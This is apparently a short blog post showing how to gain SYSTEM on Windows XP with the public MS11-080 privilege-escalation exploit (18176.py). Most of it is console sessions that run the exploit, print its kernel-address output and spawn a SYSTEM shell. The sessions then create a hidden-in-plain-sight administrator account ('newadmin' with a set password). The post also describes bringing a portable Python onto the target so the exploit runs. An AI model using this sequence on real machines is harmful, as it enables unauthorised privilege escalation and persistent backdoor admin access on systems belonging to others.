So you’ve got access to a box but it’s only as a local user and you want SYSTEM like most people, step in 18176.py. As this code was written in python you’ll need a local copy of python on the box in order to priv up.
1 2 3 4 5 6 7 | C:\Documents and Settings\user\Desktop>18176.py Usage: 18176.py -O TARGET_OS Options: -h, --help show this help message and exit -O TARGET_OS, --target-os=TARGET_OS Target OS. Accepted values: XP, 2K3 C:\Documents and Settings\user\Desktop> |
My first attempt was with python version 3.2.2. and for some reason the code kept failing.
1 2 3 4 5 6 | C:\Documents and Settings\user\Desktop>18176.py File "C:\Documents and Settings\Administrator\Desktop\18176.py", line 56 print "[+] Retrieving %s info..." % drvname ^ SyntaxError: invalid syntax C:\Documents and Settings\user\Desktop> |
Python version 2.7 seemed to work just fine 🙂
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | C:\Documents and Settings\user\Desktop>net user newadmin /add System error 5 has occurred. Access is denied. C:\Documents and Settings\user\Desktop>18176.py -O XP [>] MS11-080 Privilege Escalation Exploit [>] Matteo Memelli - ryujin@offsec.com [>] Release Date 28/11/2011 [+] Retrieving Kernel info... [+] Kernel version: ntkrnlpa.exe [+] Kernel base address: 0x804d7000L [+] HalDispatchTable address: 0x8054d038L [+] Retrieving hal.dll info... [+] hal.dll base address: 0x806e5000L [+] HaliQuerySystemInformation address: 0x806fbbbaL [+] HalpSetSystemInformation address: 0x806fe436L [*] Triggering AFDJoinLeaf pointer overwrite... [*] Spawning a SYSTEM shell... C:\WINDOWS\system32> |
And now for the quick new user 🙂
1 2 3 4 5 6 7 8 9 10 11 12 | C:\WINDOWS\system32>net user newadmin Secret01 /add The command completed successfully. C:\WINDOWS\system32>net localgroup Administrators newadmin /add The command completed successfully. C:\WINDOWS\system32>net user User accounts for \\ ------------------------------------------------------------------ Administrator ASPNET Guest HelpAssistant newadmin SUPPORT_388945a0 user The command completed with one or more errors. C:\WINDOWS\system32> |
I got thinking, yeah I could attempt to rewrite this exploit in another language but that’s way past my skill level and available time. So what about a portable version of python? Step in PortablePython! The download is 45MB and once extracted it’s 222MB. Then it’s just a simple case of pointing the python.exe at the code 🙂
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | C:\Documents and Settings\user\Desktop>PortablePy\App\python.exe 18176.py -O XP [>] MS11-080 Privilege Escalation Exploit [>] Matteo Memelli - ryujin@offsec.com [>] Release Date 28/11/2011 [+] Retrieving Kernel info... [+] Kernel version: ntkrnlpa.exe [+] Kernel base address: 0x804d7000L [+] HalDispatchTable address: 0x8054d038L [+] Retrieving hal.dll info... [+] hal.dll base address: 0x806e5000L [+] HaliQuerySystemInformation address: 0x806fbbbaL [+] HalpSetSystemInformation address: 0x806fe436L [*] Triggering AFDJoinLeaf pointer overwrite... [*] Spawning a SYSTEM shell... C:\WINDOWS\system32>net user newuser Secret01 /add The command completed successfully. C:\WINDOWS\system32> |
It would be nice to see how much I could strip out of the portable version in order to decrease it’s size, but then that’s just something else for a rainy day.
How long before this is written in powershell or added to meterpreter’s getsystem code?
Leave a Reply
You must be logged in to post a comment.